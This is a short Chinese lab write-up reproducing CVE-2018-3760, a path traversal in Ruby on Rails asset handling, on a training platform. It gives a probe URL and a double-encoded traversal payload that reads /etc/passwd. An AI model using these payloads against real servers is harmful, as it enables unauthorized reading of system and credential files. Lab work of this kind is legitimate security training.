墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
David WangYang22 分钟前
便宜的自制 30 MHz - 6 GHz 矢量网络分析仪
开发语言·网络·php
Eoch7728 分钟前
HashMap夺命十连问,你能撑到第几轮?
java·后端
每天进步一点_JL29 分钟前
🔥 一个 synchronized 背后,JVM 到底做了什么?
后端
SamDeepThinking41 分钟前
有了 AI IDE 之后,为什么还还要 CLI?
后端·ai编程·cursor
yinke小琪42 分钟前
线程池七宗罪:你以为的优化其实是在埋雷
java·后端·面试
我不是混子1 小时前
Spring Boot启动时的小助手:ApplicationRunner和CommandLineRunner
java·后端
用户723905105691 小时前
Java并发编程原理精讲
后端
粟悟饭&龟波功1 小时前
【网络安全】二、入门篇:HTTP 协议进阶 ——GET/POST 常用传参方法详解
安全·web安全·http
njxiejing1 小时前
网桥(交换机)地址学习与转发流程案例分析(一文掌握)
网络
在钱塘江1 小时前
Elasticsearch 快速入门 - Python版本
后端·python·elasticsearch